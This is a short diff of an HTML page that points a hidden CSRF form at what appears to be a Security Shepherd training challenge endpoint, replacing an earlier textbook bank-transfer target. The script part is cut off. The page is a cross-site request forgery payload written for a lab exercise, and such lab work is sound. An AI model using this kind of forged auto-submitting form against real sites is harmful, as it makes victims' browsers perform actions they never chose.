--- a/index.html
+++ b/index.html
@@ -7,8 +7,8 @@
     <body>
         <h1>Crazydais - CSR</h1>
         
-        <form id="csrf" action="http://bank.com/transfer.do" method="POST">
-            <input type="hidden" name="userId" value="123abc"/>
+        <form id="csrf" action="https://shepherd.waratek.lan/user/csrfchallengetwo/plusplus" method="POST">
+            <input type="hidden" name="userId" value="fcab4e7dfbe01ce4e3904b97febe6a6a184302c3"/>
         </form>
 
         <script>
